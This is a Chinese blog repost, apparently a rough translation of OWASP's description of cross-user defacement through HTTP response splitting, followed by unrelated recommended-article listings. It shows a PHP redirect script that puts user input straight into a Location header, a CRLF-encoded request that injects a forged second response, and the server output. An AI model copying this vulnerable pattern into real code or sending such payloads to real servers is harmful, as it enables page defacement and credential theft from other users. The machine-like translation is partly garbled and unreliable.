跨用户污损,这是一种攻击!

最新推荐文章于 2024-08-15 08:33:03 发布
最新推荐文章于 2024-08-15 08:33:03 发布
阅读量350 收藏
点赞数
文章标签: 黑客攻击 服务器 安全 tcp

原文出处:https://www.fortoscer.com/forum.php?mod=viewthread&tid=4&extra=page%3D1

跨用户污损

攻击者可以对脆弱的服务器一个请求,将导致断绝创建两个响应,第二个可能被误解为一个不同的请求的响应,可能的一个被其他用户共享与断绝同一个TCP连接发。这可以通过诱使用户提交恶意请求本身,或远程的情况下完成,其中攻击者与用户共享一个共同的TCP连接到服务器,例如一个共享的代理服务器。在最好的情况下,攻击者可以利用这种能力来说服应用程序已被黑客攻击的用户,导致用户失去对应用程序的安全信心。在最坏的情况下,攻击者可能会提供旨在模仿应用程序的行为,但重定向的私人信息,如账号和密码,给攻击者的特制内容。
这种攻击是相当困难在实际环境中进行。条件的名单很长,很难被攻击者来完成。
跨用户污损攻击是可能的,因为HTTP响应拆分在Web应用程序和缺陷。它是从图攻击者的点至关重要的应用允许使用CR(Carrige返回)和LF(换行)的字符多于一个报头填充所述头字段。
风险因素
TBD

例子
我们发现一个网页,它从“页”的说法得到服务的名称,然后重定向(302)这项服务。
而redir.php的示范代码:
  1. rezos@spin ~/public_html $ cat redir.php
  2. <?php
  3. header ("Location: " . $_GET['page']);
  4. ?>
复制代码
编写适当的请求:
  1. /redir.php?page=http://other.testsite.com%0d%0aContent-
  2. Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-
  3. Type:%20text/html%0d%0aContent-
  4. Length:%2019%0d%0a%0d%0a<html>deface</html>
复制代码
HTTP服务器将响应以下两个头信息:
1、
  1. HTTP/1.1 302 Moved Temporarily
  2. Date: Wed, 24 Dec 2003 15:26:41 GMT
  3. Location: http://testsite.com/redir.php?page=http://other.testsite.com
  4. Content-Length: 0
复制代码
2、
  1. HTTP/1.1 200 OK
  2. Content-Type: text/html
  3. Content-Length: 19
  4. <html>deface</html>
复制代码
如果用户共享一个TCP连接(代理缓存),并会发送一个请求:
/index.html
响应#2将被作为一个请求的响应 发送给用户
这种方式有可能替代网页,这是提供给指定的用户。

更多信息可以在演示文稿中的一个下找到http://www.owasp.org/images/1/1a/OWASPAppSecEU2006_HTTPMessageSplittingSmugglingEtc.ppt

原文出处:https://www.fortoscer.com/forum.php?mod=viewthread&tid=4&extra=page%3D1

fortoscer
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XSS(站脚本攻击)详解
谢公子的博客
09-08 7万+
目录 XSS的原理和分类 XSS的攻击载荷 XSS可以插在哪里? XSS漏洞的挖掘 XSS的攻击过程 XSS漏洞的危害 XSS漏洞的简单攻击测试 反射型XSS: 存储型XSS: DOM型XSS: XSS的简单过滤和绕过 ​XSS的防御 反射型XSS的利用姿势 get型 post型 利用JS将用户信息发送给后台 XSS的原理和分类 站脚本攻击XSS(Cros...
行业文档-设计装置-一种书画邮寄卷筒.zip
08-30
标签“行业文档-设计装置-一种书画邮寄”进一步明确了这是一个关于行业标准或者实践的文档,可能包含设计原理、制造流程、使用方法以及潜在的改进空间等内容。这样的文档对于从事书画艺术品运输、包装设计或者物流...
链接注入(便于站请求伪造)
热门推荐
日拱一卒无有尽,功不唐捐终入海
11-25 1万+
安全风险: 可能会劝说初级用户提供诸如用户名、密码、信用卡号、社会保险号等敏感信息可能会窃取或操纵客户会话和 cookie,它们可能用于模仿合法用户,从而使黑客能够以该用户身份查看或变更用户记录以及执行事务可能会在 Web 服务器上上载、修改或删除 Web 页面、脚本和文件 可能原因 未对用户输入正确执行危险字符清理 技术描述 “链接注入”是修
一种基于边缘特征的纸币污损检测方法
04-15
一种基于边缘特征的纸币污损检测方法
行业分类-设备装置-一种纸币存取装置.zip
09-05
本文件将深入探讨一种特定的纸币存取装置,其设计旨在提高设备的安全性、可靠性和用户体验。 这种纸币存取装置通常由以下几个关键部分组成: 1. **进钞口**:用户将纸币插入的入口,通常配备有防伪技术,如磁性...
一种车载移动电子警察控制系统的解决方法
10-23
由于移动电子警察系统应用的实际环境十分多样和复杂,道路上的背景图像、四季、昼夜、晴雨等不同情况的光照、镜头焦距、摄像角度等直接影响车辆图像的成像质量,车辆速度的快慢、车辆运动中的摇晃、车牌的污损和遮挡...
行业分类-设备装置-一种识别纸币的方法及存取款装置.zip
09-04
这涉及到图像处理算法,用于解析纸币的光学特征,以及复杂的逻辑控制程序,负责处理各种可能的异常情况,如纸币折叠、污损或破损。同时,这些系统还需要与银行后台系统实时通信,确认纸币的面额和合法性,并更新账户...
美国服务器稳定么?影响服务器稳定性的6个因素
petaexpress的博客
08-09 748
美国服务器的稳定性是相当不错的,这主要得益于其先进的技术、成熟的基础设施以及严格的管理措施。美国拥有众多知名的服务器提供商,这些提供商通常会采用顶级的硬件设施,如英特尔、AMD等知名品牌的处理器,以及三星、金士顿等品牌的内存和硬盘,这些硬件设备在全球范围内具有较高的市场份额和良好的口碑,性能稳定可靠。
CVE-2024-27198 和 CVE-2024-27199:JetBrains TeamCity 服务器的漏洞利用及其防护措施
weixin_47075747的博客
08-13 610
*和**是两个与服务器相关的严重漏洞。通过这些漏洞,攻击者可以绕过TeamCity内置的身份验证机制,创建管理员账户、枚举用户信息、生成授权令牌,甚至在服务器上远程执行任意代码。其根本原因在于TeamCity的REST API路由处理中的身份验证绕过问题。
linux HBA驱动中scsi_host_template .shost_attrs
Wang20122013的博客
08-13 515
scsi_host_template是一个结构体,用于定义SCSI主机(host adapter)的属性和操作。这个模板用于初始化SCSI主机结构体scsi_host_template,它包含了主机的属性、操作函数等。shost_attrs是scsi_host_template结构体中的一个成员,它是一个属性组,用于定义SCSI主机可以支持的属性。每个属性都会有相应的操作函数,这些函数定义了如何读取或写入属性值。例如,一个属性可能有一个show函数来返回当前值,一个store函数来设置新值。
仿Muduo库实现高并发服务器——socket网络通信模块
2201_75324712的博客
08-13 249
服务端:socket(),bind(),listen(),accept().客户端:socket(),connect().下面这段代码,没什么好讲的,就不再讲了。
国内机房与海外机房之间的区别是什么?
wanhengwangluo的博客
08-14 671
服务器的配置上国内的徐州机房一般会受到电信和网通等运营商的影响,配置方面会相对简单一点,但是也会提供多个服务器配置选项,企业能够根据自身的业务需求来选择合适的服务器;海外机房与国内机房的服务器还是有着多方面的区别的,首先在地理位置上海外机房通常是位于中国以外的国家或者是地区,而国内机房则是包含中国各大城市的数据中心,比如徐州的淮海大数据中心。以上就是小编今天分享的内容了,如果还想了解更多内容,或者对服务器感兴趣的话,可以持续关注万恒网络科技,对于不了解和需要进行咨询的地方,也可以私信或评论小编!
Linux 系统进程
javaMov的专栏
08-14 350
USER #进程执行用户(每个进程都需要一个用户来管理)PID #*****重点*****子进程号%CPU #CPU占用的百分(1核满负荷=100%,4核满负荷=400%)%MEM #内存占用百分比VSZ #虚拟内存的使用情况(单位:kb),占用内存多少RSS #使用内存的使用情况(单位:kb),使用多少内存TTY #链接主机的终端类型(?:系统自己内部运行的进程)STAT #*****重点*****进程运行的状态Z R SSTART #进程启动时间,什么时间启动、出现的;
Linux:文件管理,目录管理,文件系统,链接类型
燕双嘤
08-13 1233
在Linux操作系统中,文件和目录的管理是日常操作的核心。无论您是系统管理员还是开发者,掌握Linux中文件和目录的管理方法对于高效工作至关重要。本篇博客将深入探讨Linux中的文件管理、目录管理、文件类型及链接类型,帮助您熟练操作和管理您的系统资源。
[Linux CMD] 目录与文件相关的命令
最新发布
庐陵居士
08-15 227
代表次层目录代表上一层目录代表前一个工作目录~ 代表目前使用者身份所在的家目录~account 代表account这个使用者的家目录(account是个账号名称)
仿Muduo库实现高并发服务器——事件监控Poller模块
2201_75324712的博客
08-13 221
这个模块是将触发事件的描述符,给到外面,让外面去做对应的处理。
Java面试八股之什么是MQTT协议
u012151345的博客
08-13 1041
MQTT(Message Queuing Telemetry Transport,消息队列遥测传输)是一种轻量级的“发布/订阅”(Publish/Subscribe)模式的消息传输协议,特别适合于远程和低带宽网络环境,如物联网(IoT)和移动应用。MQTT支持一对多的消息传输,即一个消息发布者可以将消息发送到一个主题,而多个订阅者可以通过订阅这个主题来接收消息。这种模式允许高效的多播通信。MQTT支持会话状态的持久化,这意味着当客户端重新连接时,可以恢复之前的会话状态,继续接收之前订阅的消息。
上网行为管理之应用控制实验
qq_65150735的博客
08-14 429
上网行为管理之应用控制实验
Linux环境下运行介绍
shiwei0813的博客
08-14 353
如果在Linux系统下学习C语言,就会了解到两套文件编程接口函数:C语言标准的文件编程函数:fopenfreadfwritefcloseLinux下提供的文件编程函数:openreadwriteclose基于文件指针: fopen fclose fread fwrite 比较适合操作普通文件。基于文件描述符: open close read write 比较适合操作设备文件。
criminisi修复污损车牌的代码实现
06-11
Criminisi等人在2004年发表了一篇论文,题为"Region Filling and Object Removal by Exemplar-Based Image Inpainting",提出了一种基于范例的图像修复方法。这种方法通过识别图像中的缺陷区域,并从图像中的其他...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值